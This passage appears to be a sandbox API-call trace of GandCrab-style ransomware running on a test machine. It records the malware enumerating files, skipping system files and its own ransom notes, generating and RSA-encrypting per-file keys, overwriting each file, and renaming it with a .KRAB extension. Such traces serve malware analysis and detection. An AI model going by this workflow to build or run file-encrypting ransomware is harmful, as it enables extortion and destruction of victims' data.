dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.353] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.354] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.354] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.354] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.354] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.354] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.354] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.355] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.355] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.355] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.355] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.355] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.356] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.356] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.356] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd360) returned 1 [0057.356] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.356] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.357] GetLastError () returned 0x0 [0057.357] CryptDestroyKey (hKey=0xfbd360) returned 1 [0057.357] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.357] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.357] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3a0) returned 1 [0057.357] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.357] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.358] GetLastError () returned 0x0 [0057.358] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0057.358] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.358] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\idwv6myh.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.358] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.358] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.359] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x17679, lpOverlapped=0x0) returned 1 [0057.377] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe8987, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.377] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x17679, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x17679, lpOverlapped=0x0) returned 1 [0057.377] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.377] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.381] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.382] CloseHandle (hObject=0x43c) returned 1 [0057.384] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.384] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\idwv6myh.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\IDWv6mYH.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\idwv6myh.mkv.krab")) returned 1 [0057.385] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.385] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.385] lstrcmpW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2=".") returned 1 [0057.385] lstrcmpW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="..") returned 1 [0057.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="iQnDpe005_pHgwX76V8.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg" [0057.385] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.386] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg.KRAB") returned 66 [0057.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg") returned 61 [0057.386] lstrlenW (lpString=".jpg") returned 4 [0057.386] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.386] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".jpg ") returned 5 [0057.386] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg") returned 61 [0057.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg") returned 61 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="desktop.ini") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="autorun.inf") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="ntuser.dat") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="iconcache.db") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="bootsect.bak") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="boot.ini") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="ntuser.dat.log") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="thumbs.db") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="ntldr") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="NTDETECT.COM") returned -1 [0057.387] lstrcmpiW (lpString1="iQnDpe005_pHgwX76V8.jpg", lpString2="Bootfont.bin") returned 1 [0057.387] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.387] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.388] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.388] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.388] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.388] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.388] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.388] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.389] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.389] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.389] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.390] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.390] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.390] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.390] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.390] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.390] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd360) returned 1 [0057.390] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.391] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.391] GetLastError () returned 0x0 [0057.391] CryptDestroyKey (hKey=0xfbd360) returned 1 [0057.391] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.391] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.391] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd1e0) returned 1 [0057.391] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.391] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.392] GetLastError () returned 0x0 [0057.392] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0057.392] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.392] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\iqndpe005_phgwx76v8.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.392] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.393] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.393] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x12a65, lpOverlapped=0x0) returned 1 [0057.408] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffed59b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.408] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x12a65, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x12a65, lpOverlapped=0x0) returned 1 [0057.408] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.408] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.414] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.415] CloseHandle (hObject=0x43c) returned 1 [0057.417] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.417] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\iqndpe005_phgwx76v8.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\iQnDpe005_pHgwX76V8.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\iqndpe005_phgwx76v8.jpg.krab")) returned 1 [0057.429] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.430] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.430] lstrcmpW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2=".") returned 1 [0057.430] lstrcmpW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="..") returned 1 [0057.430] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="jEq3czG5M-p8F-9M8ls.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a" [0057.430] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.430] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a.KRAB") returned 66 [0057.430] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a") returned 61 [0057.430] lstrlenW (lpString=".m4a") returned 4 [0057.430] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.430] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".m4a ") returned 5 [0057.430] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a") returned 61 [0057.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a") returned 61 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="desktop.ini") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="autorun.inf") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="ntuser.dat") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="iconcache.db") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="bootsect.bak") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="boot.ini") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="ntuser.dat.log") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="thumbs.db") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="ntldr") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="NTDETECT.COM") returned -1 [0057.431] lstrcmpiW (lpString1="jEq3czG5M-p8F-9M8ls.m4a", lpString2="Bootfont.bin") returned 1 [0057.431] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.431] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.432] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.432] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.432] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.432] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.432] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.432] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.433] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.433] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.434] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.434] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.434] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.434] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.434] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.434] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.435] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd8e0) returned 1 [0057.435] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.435] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.435] GetLastError () returned 0x0 [0057.435] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0057.435] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.435] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.436] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd6a0) returned 1 [0057.436] CryptGetKeyParam (in: hKey=0xfbd6a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.436] CryptEncrypt (in: hKey=0xfbd6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.436] GetLastError () returned 0x0 [0057.436] CryptDestroyKey (hKey=0xfbd6a0) returned 1 [0057.436] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.436] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jeq3czg5m-p8f-9m8ls.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.437] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.437] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.437] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x3c51, lpOverlapped=0x0) returned 1 [0057.453] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffc3af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.453] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3c51, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x3c51, lpOverlapped=0x0) returned 1 [0057.453] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.453] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.460] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.460] CloseHandle (hObject=0x43c) returned 1 [0057.461] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.461] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jeq3czg5m-p8f-9m8ls.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jEq3czG5M-p8F-9M8ls.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\jeq3czg5m-p8f-9m8ls.m4a.krab")) returned 1 [0057.462] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.462] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.462] lstrcmpW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2=".") returned 1 [0057.462] lstrcmpW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="..") returned 1 [0057.462] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="jpg95_MxI58ijuhWkA1.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif" [0057.462] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.462] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif.KRAB") returned 66 [0057.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif") returned 61 [0057.463] lstrlenW (lpString=".gif") returned 4 [0057.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.463] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".gif ") returned 5 [0057.463] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif") returned 61 [0057.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\jpg95_MxI58ijuhWkA1.gif") returned 61 [0057.463] lstrcmpiW (lpString1="jpg95_MxI58ijuhWkA1.gif", lpString2="desktop.ini") returned 1 [0057.463] 